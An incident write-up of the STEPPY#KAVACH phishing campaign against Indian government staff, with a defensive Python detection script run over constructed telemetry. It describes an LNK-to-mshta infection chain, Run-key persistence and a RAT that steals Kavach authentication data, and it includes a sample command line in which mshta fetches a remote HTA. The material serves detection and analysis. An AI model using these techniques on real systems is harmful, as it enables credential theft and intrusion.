
Cyber Incident Victim: Government of India

Date: Dec 2022

Location: India

Summary

A phishing campaign tracked as STEPPY#KAVACH targeted Indian government entities in late 2022 with emails delivering a ZIP archive that contained a shortcut file (.LNK) disguised as an image. Opening the shortcut ran mshta.exe against a remote HTA script, starting a multi-stage chain of JScript payloads that downloaded a decoy PNG, set up persistence through a registry Run key, and dropped a C#-based remote access trojan (RAT). The RAT specifically searched for "kavach.db", the local database of India's Kavach multi-factor authentication client for government email, and also supported execution of additional payloads, screenshot capture and command-and-control (C2) over Triple-DES-encrypted channels with a static key. Infrastructure analysis found compromised Indian government-related websites used for initial payload staging and German-hosted servers for C2, with infrastructure and tooling overlaps with Pakistan-linked groups such as SideCopy and APT36 (Transparent Tribe).


Description

The incident was a targeted phishing campaign, tracked as STEPPY#KAVACH, against Indian government employees, first observed in late 2022. The attackers sent emails carrying a ZIP archive ("11222022.zip") that contained a shortcut file ("Scanimg.png.lnk") using a double extension to pass as an image. Opening the LNK launched mshta.exe, which retrieved and ran a remote HTA payload ("sit.hta") from the compromised Indian tax-themed domain incometaxdelhi[.]org. The HTA ran JScript that checked for .NET Framework v4.0.30319 (the runtime the C# payload needs), downloaded a decoy PNG ("8292.png") showing a year-old Indian Ministry of Defence news article to keep the victim occupied, and executed six further JScript files. These scripts created a working directory ("C:\ProgramData\dvixm"), downloaded the RAT payload "mm1.exe" from 155.133.23[.]244, established persistence through a registry Run key ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"), and forced a reboot so that the Run key would start the malware. The chain relied on living-off-the-land binaries (LOLBins) such as mshta.exe and PowerShell rather than custom loaders, and its infrastructure combined compromised Indian government-affiliated domains for staging with German-hosted C2 servers.


The final payload, "mm1.exe," was a C#-based remote access trojan with a December 2022 compile timestamp, functioning as a reconnaissance and exfiltration tool. It specifically looked for the Kavach multi-factor authentication database ("kavach.db") under the victim's AppData\Roaming directory, which indicates precise knowledge of Indian government authentication tooling. The malware derived a victim identifier from the domain, username and machine name, then communicated with C2 IP 155.133.23[.]244 over ports 3309-3311 using Triple-DES with the hard-coded key "function_load." A static key shared by every sample means the traffic is confidential only against casual inspection: anyone who recovers the key from the binary can decrypt captured sessions, which is useful to defenders reconstructing what was exfiltrated. Capabilities included executing attacker-supplied .exe and .vbs files, capturing screenshots, enumerating files and exfiltrating data. Infrastructure analysis linked the campaign to earlier SideCopy/APT36 activity, including reused IPs that redirected visitors to the Indian government email portal (email.gov[.]in) and a consistent preference for German hosting providers such as Contabo. The focus on Kavach data and government-themed lures points to an objective of compromising Indian administrative email credentials, with evidence of operational continuity from at least March 2022. Detection opportunities noted in the reporting include mshta.exe making outbound network connections, specific file paths (e.g., ProgramData\mm1.exe) and the C2 IP; no victim-side containment actions were detailed. Paths and IPs are cheap for the operator to rotate, so behavioural detections (mshta.exe launched with a URL, a Run key pointing into ProgramData, a process other than the Kavach client reading kavach.db) are the more durable signal.
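Both the infection chain in the Description and the indicators in the paragraph above lend themselves to host-side detection. The following Python is an added example, not code from the page or from the original reporting: it runs a handful of behavioural rules over constructed, Sysmon-like telemetry. The event field names, the "FileRead" event kind (Sysmon has no file-read event; an EDR would supply one), the Kavach client image name kavach.exe, the severities and every sample path are assumptions; the C2 address and ports, the staging domain, the file names and the Run-key persistence are taken from the description above.

```python
"""Rule-based triage of host telemetry for the STEPPY#KAVACH chain described above.

Added example, not code from the page or the original reporting. Events are
constructed in a Sysmon-like shape (EventID 1 process create, 3 network connect,
11 file create, 13 registry value set); "FileRead" stands in for an EDR
file-access event, which Sysmon lacks. Field names, the Kavach client image
name and the severities are assumptions to adapt to your own telemetry.
"""
import re

C2_IPS = {"155.133.23.244"}            # indicators named in the description
C2_PORTS = {3309, 3310, 3311}
STAGING_DOMAINS = {"incometaxdelhi.org"}
URL_RE = re.compile(r"https?://([^\s/\"']+)", re.IGNORECASE)
DOUBLE_EXT_LNK_RE = re.compile(r"\.(png|jpe?g|gif|pdf|docx?|xlsx?)\.lnk$", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
KAVACH_PROCESSES = {"kavach.exe"}  # assumption: legitimate Kavach client image name


def basename(path):
    """Lower-cased last path component, so rules compare image names, not paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_mshta_remote(ev):
    """mshta.exe handed a URL: the LNK -> remote HTA step of the chain."""
    if ev["EventID"] != 1 or basename(ev.get("Image", "")) != "mshta.exe":
        return None
    m = URL_RE.search(ev.get("CommandLine", ""))
    if not m:
        return None
    host = m.group(1).split(":")[0].lower()
    sev = "high" if host in STAGING_DOMAINS else "medium"
    return (sev, "mshta_remote_hta", f"mshta.exe pulled remote HTA from {host}")


def rule_double_extension_lnk(ev):
    """Shortcut written to disk with an image/document extension in front of .lnk."""
    name = ev.get("TargetFilename", "")
    if ev["EventID"] == 11 and DOUBLE_EXT_LNK_RE.search(name):
        return ("medium", "double_extension_lnk", f"shortcut masquerading as a file: {name}")
    return None


def rule_run_key_programdata(ev):
    """Run-key value pointing under ProgramData, the persistence used for mm1.exe."""
    if ev["EventID"] != 13 or not RUN_KEY_RE.search(ev.get("TargetObject", "")):
        return None
    details = ev.get("Details", "")
    if "\\programdata\\" in details.lower():
        return ("high", "run_key_programdata", f"Run value {basename(ev['TargetObject'])} -> {details}")
    return None


def rule_kavach_db_access(ev):
    """Any image other than the Kavach client reading kavach.db."""
    if ev["EventID"] != "FileRead" or basename(ev.get("TargetFilename", "")) != "kavach.db":
        return None
    if basename(ev.get("Image", "")) in KAVACH_PROCESSES:
        return None
    return ("critical", "kavach_db_foreign_read", f"{ev['Image']} read {ev['TargetFilename']}")


def rule_c2_connect(ev):
    """Outbound connection to the known C2 address or to its unusual port range."""
    if ev["EventID"] != 3 or not ev.get("Initiated", True):
        return None
    ip, port = ev.get("DestinationIp"), int(ev.get("DestinationPort", 0))
    if ip not in C2_IPS and port not in C2_PORTS:
        return None
    sev = "critical" if ip in C2_IPS else "low"  # port alone is a weak, pivot-only signal
    return (sev, "c2_connect", f"{basename(ev.get('Image', ''))} -> {ip}:{port}")


RULES = (rule_mshta_remote, rule_double_extension_lnk, rule_run_key_programdata, rule_kavach_db_access, rule_c2_connect)


def triage(events):
    """Run every rule over every event and collect (severity, rule, detail) hits."""
    alerts = []
    for ev in events:
        alerts.extend(hit for hit in (rule(ev) for rule in RULES) if hit)
    return alerts


# Constructed sample telemetry mixing benign activity with the campaign's steps.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": r'mshta.exe "C:\Tools\report.hta"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://incometaxdelhi.org/sit.hta"},
    {"EventID": 11, "Image": r"C:\Program Files\7-Zip\7zFM.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\11222022\Scanimg.png.lnk"},
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\dvixm",
     "Details": r"C:\ProgramData\dvixm\mm1.exe"},
    {"EventID": "FileRead", "Image": r"C:\Program Files\Kavach\kavach.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\kavach.db"},
    {"EventID": "FileRead", "Image": r"C:\ProgramData\dvixm\mm1.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\kavach.db"},
    {"EventID": 3, "Image": r"C:\ProgramData\dvixm\mm1.exe", "Initiated": True,
     "DestinationIp": "155.133.23.244", "DestinationPort": 3310},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "Initiated": True,
     "DestinationIp": "203.0.113.7", "DestinationPort": 443},
]

if __name__ == "__main__":
    for sev, rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {rule}: {detail}")
```

Run directly, it prints one alert per malicious sample event; the local mshta.exe invocation, the legitimate Kavach client reading its own database and the browser's HTTPS connection stay quiet. The port-only branch of the C2 rule is deliberately low severity: 3309-3311 are unusual but not unique to this campaign, so treat a port-only hit as a pivot for hunting rather than an alert in its own right.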
